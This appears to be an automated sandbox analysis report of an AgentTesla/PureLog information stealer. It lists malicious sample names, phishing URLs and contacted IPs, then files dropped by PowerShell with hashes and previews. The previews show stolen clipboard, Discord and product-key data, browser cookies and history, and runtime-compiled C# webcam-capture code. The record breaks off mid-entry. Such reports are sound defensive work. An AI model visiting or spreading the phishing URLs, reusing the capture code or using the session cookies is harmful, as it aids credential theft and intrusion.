3b5074b1b5d032e5620f69f9f700ff0e | c2e57fb2b8206bd9b5d05d8a9b0d2e78082dd303ee6364b288d568fcd48900f7_dump.exe | malicious | AgentTesla, PureLog Stealer | 140.82.121.3, 185.199.110.133, 104.16.123.96, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | XX(1).exe | malicious | AgentTesla, PureLog Stealer | 140.82.121.3, 185.199.110.133, 104.16.123.96, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | Ship Docs_CI PL HBL COO_.exe | malicious | AgentTesla | 140.82.121.3, 185.199.110.133, 104.16.123.96, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | https://singingfiles.com/show.php?l=0&u=2156442&id=64574 | malicious | Unknown | 140.82.121.3, 185.199.110.133, 104.16.123.96, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | https://sula.starladeroff.com/ | malicious | Unknown | 140.82.121.3, 185.199.110.133, 104.16.123.96, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/ | malicious | HTMLPhisher | 140.82.121.3, 185.199.110.133, 104.16.123.96, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | http://helpdesk-advertising-review-id-9865133.d3m7n55z273utf.amplifyapp.com/index.html | malicious | Unknown | 140.82.121.3, 185.199.110.133, 104.16.123.96, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | https://pub-9445ce0d74714d1c934c51ffcf83c3f2.r2.dev/slnt.html?nycsbs | malicious | HTMLPhisher | 140.82.121.3, 185.199.110.133, 104.16.123.96, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | https://pradeeprunner.com/auth.html | malicious | Unknown | 140.82.121.3, 185.199.110.133, 104.16.123.96, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | https://iwahadxi.hosted.phplist.com/lists/lt.php/?tid=eU1SAFEEUlZTABhUAVAGGAZWVFsfXVQLWkkDBQIAUAwCAgcAAldPWwdaBlNRVAgYVwEEXh9QClxcSQcAUlcbWgQGAAJVVwRXBAoBSQcBAVALVA8LHwIEXVtJUg8GVxsAVVMHGA5SB1EBC1YDAQQBDA | malicious | Unknown | 140.82.121.3, 185.199.110.133, 104.16.123.96, 185.199.111.133
                                        No context
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):32790
                                        Entropy (8bit):5.057207221931379
                                        Encrypted:false
                                        SSDEEP:768:nLbV3IpNBQkj2Uh4iUx1frRJv5FPvlOZhxCardFvJQOdB8tAHkLNZzNKe1MlYo7h:nLbV3CNBQkj2Uh4iUx1flJnPvlOgqdJF
                                        MD5:D53B416BCC88BD45D60DE9EB0537E679
                                        SHA1:95A90746CE8894F995A49774DC40817DA70B9CBB
                                        SHA-256:07E86C4B9B4FFD0AD5381DDFA6D95CAD3C29C9F3B6790354058E46EC445B0BBF
                                        SHA-512:BB3407649106150625694C64BC5341BC93C8D3313A555CC495793CAAA294939944E28882D9C70EAE432462E66B85D47D4032CD49898B3CD363011C8AA55B5FA9
                                        Malicious:false
                                        Preview:PSMODULECACHE.1...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.34726597513537405
                                        Encrypted:false
                                        SSDEEP:3:Nlll:Nll
                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                        Malicious:false
                                        Preview:@...e...........................................................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                        Category:modified
                                        Size (bytes):453661
                                        Entropy (8bit):7.998105367806698
                                        Encrypted:true
                                        SSDEEP:6144:y9Lqp2snxMCF1lvpXPbno1uzMWm9DxaCoLkEFj+XBXdFO2HM6Tr59SVGo09G6Tnm:ytyDTbno8okCoJNWUn6DrGvI0
                                        MD5:AA9B76622BCF24547D7D29761417EB51
                                        SHA1:92ED488C3921F562E43B77CEA69AD73D40717C79
                                        SHA-256:2AAD168EF2D425CDB71DD45549523C6D0F16BCC3C79CA4ADEE5D6D8E763A2F92
                                        SHA-512:F08D82769654B383A75569D89271F087C0120D71BDE38422789288BA67872484F516799B5F4D53066157BC16AE9F79CD0876D41C2A5356601AD6950FCA47A9F9
                                        Malicious:false
                                        Preview:PK........Q..X............8...US-(user-PC)-(2024-07-05)-(UTC-5)\clipboard_history.txtPK........`..XO..%......../...US-(user-PC)-(2024-07-05)-(UTC-5)\discord.json.+....PK........Q..Xb.7.9...@...1...US-(user-PC)-(2024-07-05)-(UTC-5)\productkey.txt.....!.!...A.HG.y..&@.;..C..1PF.......!.(..`.....M.x....PK........y..X]...I.......1...US-(user-PC)-(2024-07-05)-(UTC-5)\screenshot.pngl.{<S...~6s..V...Ln!J"ln.(.K$...J..6...k.....r.Q..~.r.s..m.....~...=.....9;....|........<....a.Z...X.O!...s .....g.........yM...".vo...}.....#?.....;......4}j3..*~h.......p.f.=n.z...3..D......~7.d..v.r'..k..H...q.1.T.=.).........@..2..n=..<.....Qr..r.....R~.b.{X.J&nV>.i..<eF;.x..V.o.j...l.\U"......j.....[...?qV..4...\=...Y....O..a..v..m......~.....8l..po....-...)....%.S.{.!1!...1...B.;B..$k.O.dk..n.E._m.Z..L>jB.~.W.....=sP0.`...>.5..:...<{t.=uge.Mq]!./.....~......[)+..CE.w.+.F....n._..P..e5..OK..X....,]....K..l.....2w......W..7{....{...|..n....K...LC.......+....K...nY..Z.;.U.
                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Fri Jul 5 05:50:52 2024, 1st section name ".debug$S"
                                        Category:dropped
                                        Size (bytes):1332
                                        Entropy (8bit):4.0119324930428455
                                        Encrypted:false
                                        SSDEEP:24:H6zW91+fENaDfHDwKEsmNwI+ycuZhNcQkRakS3QkWPNnqS2d:QENg0Khmm1ulhoa3gnqSG
                                        MD5:47D5B587DC8842FDBE224C1B70EA98ED
                                        SHA1:D29F0056F736240164A1DAACF6ACF8D29693EA50
                                        SHA-256:7866DF3A65C5DDD608D4687756A801D3759E3A9C8782D1060089F62C1C390A6D
                                        SHA-512:3FB0151D042185453CE0F658ACC12512CB90A9C38CF30FC61A08FB0C9938A732E2479D4931D6E2F238479F9595E92D29192CF53461921AEA91B427369253734F
                                        Malicious:false
                                        Preview:L......f.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP................#..+'F.@.LC..y..........4.......C:\Users\user\AppData\Local\Temp\RES4A61.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.v.w.5.r.q.q.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):4
                                        Entropy (8bit):1.5
                                        Encrypted:false
                                        SSDEEP:3:s:s
                                        MD5:37A6259CC0C1DAE299A7866489DFF0BD
                                        SHA1:2BE88CA4242C76E8253AC62474851065032D6833
                                        SHA-256:74234E98AFE7498FB5DAF1F36AC2D78ACC339464F950703B8C019892F982B90B
                                        SHA-512:04F8FF2682604862E405BF88DE102ED7710AC45C1205957625E4EE3E5F5A2241E453614ACC451345B91BAFC88F38804019C7492444595674E94E8CF4BE53817F
                                        Malicious:false
                                        Preview:null
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (522)
                                        Category:dropped
                                        Size (bytes):3339
                                        Entropy (8bit):5.834767109522286
                                        Encrypted:false
                                        SSDEEP:96:KMJfsoO2jFcRhFZyJz4MSzxPv3ujX8ZBXE5s5HwPG2cvsm/:Ka5mRtH3MelJ
                                        MD5:CAD1EE7D662C36A23B146601DB5B2DF4
                                        SHA1:D319B76371E526EC438A586BF8F0605362F54E2B
                                        SHA-256:76C63B91F584F1169B05181C6670E1ECE1E0855AB60BC5B9DC2B95C63BAA6656
                                        SHA-512:CAD0EF2463DA11528D78F02A49E98283A293C4EBFE621728197967DC4A4D8213B5FC951FB42633B64EDB57167658F0D6628D57A2F2F037E440A3BB8C44E25C59
                                        Malicious:false
                                        Preview:.google.com.FALSE./.TRUE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk.support.microsoft.com.TRUE./.FALSE.13340887435186329..AspNetCore.AuthProvider.True.support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N.support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N.support.office.com.TRUE./.TRUE.13372509232238068.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474..microsoft.com.FALSE./.FALSE.13372422837017624.MC1.GUID=749eee6039c5489b9db3000c7ab3f399
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):1317
                                        Entropy (8bit):5.064791427060137
                                        Encrypted:false
                                        SSDEEP:24:fT1boh9wG5bpjRmZDl1mJbpjRSpDl1mMQTkboPpIbpjRVp7mJbpjOSbp7mJg:f4wGvVcDl1mfVuDl1mVhpOVVp7mfScpf
                                        MD5:4E04955DF6D1EA845ECF6B7CF64B2024
                                        SHA1:38E78DF66C2A26E2648277E1BCBD62061D60565E
                                        SHA-256:34FFE9A6D5CB18AD8D6A7D3A88817ED5338E4BA823B6A938121E19D95D56FE0A
                                        SHA-512:BD6F7EEE95CF6085E5B95B1A45AEEDDCFD4095461E2922D215C513EFD78D584F78B424DF54D9B7AA81AC3B15A10B7D7819A8477D71BD5B254D5932187A4A0B20
                                        Malicious:false
                                        Preview:[. {. "url": "https://go.microsoft.com/fwlink/?linkid=851546",. "visit_count": "2". },. {. "url": "https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016",. "visit_count": "2". },. {. "url": "https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016\u0026ui=en-us\u0026rs=en-us\u0026ad=us",. "visit_count": "2". },. {. "url": "https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016\u0026ui=en-us\u0026rs=en-us\u0026ad=us",. "visit_count": "1". },. {. "url": "https://go.microsoft.com/fwlink/?LinkId=2106243",. "visit_count": "2". },. {. "url": "https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17",. "visit_count": "2". },. {. "url": "https://support.microsoft.com/en-us/office/94ba2e0b-638e
                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                        File Type:MSVC .res
                                        Category:dropped
                                        Size (bytes):652
                                        Entropy (8bit):3.1224935734251362
                                        Encrypted:false
                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry+lQkRak7YnqqNlQkWPN5Dlq5J:+RI+ycuZhNcQkRakS3QkWPNnqX
                                        MD5:CF8823FC882B2746C940064C43A4B179
                                        SHA1:3B13D278D97791FACB765544347C361A3D7EBE57
                                        SHA-256:12564B1B670AD2051C5E6A7E083C438C4E3A463C701F38D3D784C9209A1EA981
                                        SHA-512:AE3C63047D6FAF1DD5FA053CADCB46762ECC5A87FEBC0F2A1BCF109109B67C2AF1374B346666B95447E81F1559136706440F9050978F3E8C9804BB2ADE10F99E
                                        Malicious:false
                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.v.w.5.r.q.q.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.v.w.5.r.q.q.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text
                                        Category:dropped
                                        Size (bytes):5043
                                        Entropy (8bit):4.2500942903723855
                                        Encrypted:false
                                        SSDEEP:96:JL4W84Ji4AnzvN0OpVDUNKMiNjHJ4OY492VXyNbEqbE:OqHeVRV4oMiNjHJu/VCNIr
                                        MD5:2A829317F65FEA84EB85CB2376FA9E21
                                        SHA1:2F223EA8738F9989385E93B9C8CF0E8FC5E30700
                                        SHA-256:F99C46F447010A438586651FCDF9068394926247BF7656980FEE066B2069FE8F
                                        SHA-512:A438C35327297431DF19FE50683619F78EA0245BB8D3AA7553C376C365B927747D8CB8343FC2CFB4DE884DAD4EB6166589AFC98EBA385137BB3405998838ACE0
                                        Malicious:false
                                        Preview:. using System; . using System.Collections.Generic; . using System.Text; . using System.Collections; . using System.Runtime.InteropServices; . using System.ComponentModel; . using System.Data; . using System.Drawing; . using System.Windows.Forms; . . namespace WebCamLib . { . public class Device . { . private const short WM_CAP = 0x400; . private const int WM_CAP_DRIVER_CONNECT = 0x40a; . private const int WM_CAP_DRIVER_DISCONNECT = 0x40b; . private const int WM_CAP_EDIT_COPY = 0x41e; . private const int WM_CAP_SET_PREVIEW = 0x432; . private const int WM_CAP_SET_OVERLAY = 0x433; . private const int WM_CAP_SET_PREVIEWRATE = 0x434; . private const int WM_CAP_SET_SCALE = 0x435; . private const int WS_CHILD = 0x40000000; . private const int WS_VISIBLE = 0x10000000; . . [DllImport("avicap32.dll")] . protect
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (709), with no line terminators
                                        Category:dropped
                                        Size (bytes):712
                                        Entropy (8bit):5.376767381568763
                                        Encrypted:false
                                        SSDEEP:12:p37Lvkmb6KOkrk+ik9k2Lkqe1xqfz73UWZEifz7D9:V3ka6KOk9k+kqeWfdEifJ
                                        MD5:CBCB6D486302315C227266AC9EFCE036
                                        SHA1:F54E46D19DF699641A7C8C0E1C2F037472A36F5B
                                        SHA-256:BA226FD67A0E0D178B1F0310E71B3F7BD1CA4D5863808444CD204E38A753BFFC
                                        SHA-512:86254937C40402C723B7108B66D68F611510FFDA12B09D6942A43D094DBE344B54DB90EE5914A2AEE7164179516B93222DB89D0F7C1CD123B4F0A9FC0E3EB53D
                                        Malicious:true
                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /out:"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.0.cs"
                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):5632
                                        Entropy (8bit):4.173054887352793
                                        Encrypted:false
                                        SSDEEP:96:uNvaPdSdn2OlGYPdpCHkVM2oOVK6zMYm8K:uNvaFAcYPdp0kVMmVK6zMB
                                        MD5:829653988851CF5DA03C5A5DE36CBC1F
                                        SHA1:67B774D8C4D0728C9F74FA0CDFFCF89F80220699
                                        SHA-256:226AADCC71766949DEF4382068F09AB90FCAAE0A9CE24AD76833C7613EA34628
                                        SHA-512:838C37090F58D17CB7F6879CA73D9B82D05335792823ACAA9DB7828109254F631A9E26035F7B615499FDAA9FCA82A33E07727F1854206902F698E102430DB36E
                                        Malicious:false
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!................>-... ...@....... ....................................@..................................,..K....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ -......H.......\"..............................................................:.(......}....*..{....*"..}....*..{....*"..}....*..(....*....0...........{....(........ ...P......(....}.....{.... .....{..........(.....1[.{.... 5..........(....&.{.... 4....B......(....&.{.... 2..........(....&.{..........(....&*..0..!.........o.....o.....o.......(....(....*f.{.... ...........(....&*..{.... .....{..........(....&.{....(....&*...0..}.......r...p.do.....r...p.do.......+@....d...d(....,+.s
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (791), with CRLF, CR line terminators
                                        Category:modified
                                        Size (bytes):1212
                                        Entropy (8bit):5.434814676145086
                                        Encrypted:false
                                        SSDEEP:24:KJBId3ka6KOk9k+kqeWfdEifMKax5DqBVKVrdFAMBJTH:Ckka6Nk9k+kqeKdEuMK2DcVKdBJj
                                        MD5:8021C33E5C7C86899C0AD23408337DC2
                                        SHA1:B73A024DD3ED5B236AC7E788A15A6713B03B3532
                                        SHA-256:95CB7F6E98B122D914B1279D31C5B4A86839A204765E58EFD10AE73C7522A41E
                                        SHA-512:D58DEB75C87338B8DC5404E15AF7DAFA65B0EE1D051EE2C5200997E301193FE174E33A6E6F3342A0ADDB896432A741B56180EA0D538CE0658B4AE4E6AB4CDE9A
                                        Malicious:false
                                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /out:"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, bu
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):4
                                        Entropy (8bit):1.5
                                        Encrypted:false
                                        SSDEEP:3:s:s
                                        MD5:37A6259CC0C1DAE299A7866489DFF0BD
                                        SHA1:2BE88CA4242C76E8253AC62474851065032D6833
                                        SHA-256:74234E98AFE7498FB5DAF1F36AC2D78ACC339464F950703B8C019892F982B90B
                                        SHA-512:04F8FF2682604862E405BF88DE102ED7710AC45C1205957625E4EE3E5F5A2241E453614ACC451345B91BAFC88F38804019C7492444595674E94E8CF4BE53817F
                                        Malicious:false
                                        Preview:null
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):460481
                                        Entropy (8bit):7.914690366125357
                                        Encrypted:false
                                        SSDEEP:12288:2U9Yh2N1hYOM1/9cV2fh2e1oDB+JwTZ+z:2fh2tvGlv2f4JwTZU
                                        MD5:F4FAD593F5625BCB8B1B7B0F422F9F6E
                                        SHA1:12A472D3C5F030B6E7112576FFC34A87BE4165B5
                                        SHA-256:418D38C1AA554755277D5DA39078395F2BB98877C82A5C1C6AFC1132770921D5
                                        SHA-512:1B68B0C3A9CFF24B76EECCB1F75D5F3C9830072E53C69A5CCFC07D6568DD566825EE1DDEF0B3AEF9FE4E5A65148ADDB7A675FC850065426266A63A9EFD6F63EF
                                        Malicious:false
                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mU....v..I.s.w..XU......X...ZQe..Rr...d.`.....lD%H.1.XGK).$.U6.$... ...c......ko.[{Z...o.c......>F.s./...l...C.;%...O{..tO..:'.{X`.t.4:.....N.y/..C....&.|..L.?M.........Wl.h.q.~ant>..91ulL.sO...yb..Y..HL.-..H........=.#.....5...k...4.C....CfO....L...?..S.yx~9....c1U....s....[.}.j........2.1..@..i.Y..#..L}.........5.?........<.E.S........E.S.Mys.....,z.`..'.Wj..u.@..3f..wd...fj..{ ...wf....+........"c.m.N.[Z........]us....j.[n....e....93..rK...a.P..%)O0f..>7V.7'...Z..S|Q.k.T._.w..}R<...i......h<...ml..o......j.....K.=......{]_-yS..3..b.t....v....zM.....'..M..RLcA>.=o....e.]B,...%/.;;].../J.tw.*...J.-!..w..Z.k.....NWe.;^...qC.l..o.{...]....;\Yu.."..vL......./..;\...........%.\.Y.s.n....c~Y..K.._.....X..;...K{n.Y.10...).].O.?..%.E.^...=..h..3e...m.[..oui5..%..t.t..b.-.n.}.>,.&.k}.^..].MZ.u..*.O...Ly._\-."]7..)O.g..[.m..S...w6...nvQ..lza.)W..Z..z.
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF, LF line terminators
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):4.2915603809489475
                                        Encrypted:false
                                        SSDEEP:3:5LSUMv2KCuWML8MG+teEM8vSXuYLLAXusLYFNXuxvRteBuVSRLIMG+teAMvXURLp:5uUMeK3WML8MG+XM8vSZ/A+sENcZXVil
                                        MD5:3A20FA0A83F3ABF05A002D9A610F0E60
